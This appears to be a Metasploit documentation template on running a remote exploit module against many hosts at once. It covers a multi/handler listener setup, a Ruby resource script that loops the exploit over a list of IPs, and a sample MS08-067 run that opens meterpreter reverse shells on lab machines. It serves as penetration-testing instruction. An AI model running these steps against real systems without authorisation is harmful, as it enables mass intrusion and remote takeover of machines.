96 lines
3.1 KiB
Plaintext
96 lines
3.1 KiB
Plaintext
|
Normally, you can use <%= mod.fullname %> this way:
|
||
|
|
||
|
```
|
||
|
msf > use <%= mod.fullname %>
|
||
|
msf <%= mod.type %>(<%= mod.shortname %>) > show targets
|
||
|
... a list of targets ...
|
||
|
msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id
|
||
|
msf <%= mod.type %>(<%= mod.shortname %>) > show options
|
||
|
... show and set options ...
|
||
|
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
|
||
|
```
|
||
|
|
||
|
But since this is a remote exploit module, you can also engage multiple hosts.
|
||
|
|
||
|
First, create a list of IPs you wish to exploit with this module. One IP per line.
|
||
|
|
||
|
Second, set up a background payload listener. This payload should be the same as the one your
|
||
|
<%= mod.shortname %> will be using:
|
||
|
|
||
|
1. Do: ```use exploit/multi/handler```
|
||
|
2. Do: ```set PAYLOAD [payload]```
|
||
|
3. Set other options required by the payload
|
||
|
4. Do: ```set EXITONSESSION false```
|
||
|
5. Do: ```run -j```
|
||
|
|
||
|
At this point, you should have a payload listening.
|
||
|
|
||
|
Next, create the following script. Notice you will probably need to modify the ip_list path, and
|
||
|
payload options accordingly:
|
||
|
|
||
|
```
|
||
|
<ruby>
|
||
|
#
|
||
|
# Modify the path if necessary
|
||
|
#
|
||
|
ip_list = '/tmp/ip_list.txt'
|
||
|
|
||
|
File.open(ip_list, 'rb').each_line do |ip|
|
||
|
print_status("Trying against #{ip}")
|
||
|
run_single("use <%= mod.fullname %>")
|
||
|
run_single("set RHOST #{ip}")
|
||
|
run_single("set DisablePayloadHandler true")
|
||
|
|
||
|
#
|
||
|
# Set a payload that's the same as the handler.
|
||
|
# You might also need to add more run_single commands to configure other
|
||
|
# payload options.
|
||
|
#
|
||
|
run_single("set PAYLOAD [payload name]")
|
||
|
|
||
|
run_single("run")
|
||
|
end
|
||
|
</ruby>
|
||
|
```
|
||
|
|
||
|
Next, run the resource script in the console:
|
||
|
|
||
|
```
|
||
|
msf > resource [path-to-resource-script]
|
||
|
```
|
||
|
|
||
|
And finally, you should see that the exploit is trying against those hosts similar to the following
|
||
|
MS08-067 example:
|
||
|
|
||
|
```
|
||
|
msf > resource /tmp/exploit_hosts.rc
|
||
|
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
|
||
|
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
|
||
|
[*] Trying against 192.168.1.80
|
||
|
|
||
|
RHOST => 192.168.1.80
|
||
|
DisablePayloadHandler => true
|
||
|
PAYLOAD => windows/meterpreter/reverse_tcp
|
||
|
LHOST => 192.168.1.199
|
||
|
|
||
|
[*] 192.168.1.80:445 - Automatically detecting the target...
|
||
|
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
|
||
|
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
|
||
|
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
|
||
|
[*] Sending stage (957999 bytes) to 192.168.1.80
|
||
|
[*] Trying against 192.168.1.109
|
||
|
RHOST => 192.168.1.109
|
||
|
DisablePayloadHandler => true
|
||
|
PAYLOAD => windows/meterpreter/reverse_tcp
|
||
|
LHOST => 192.168.1.199
|
||
|
[*] 192.168.1.109:445 - Automatically detecting the target...
|
||
|
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
|
||
|
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
|
||
|
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
|
||
|
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
|
||
|
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
|
||
|
|
||
|
[*] Sending stage (957999 bytes) to 192.168.1.109
|
||
|
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
|
||
|
```
|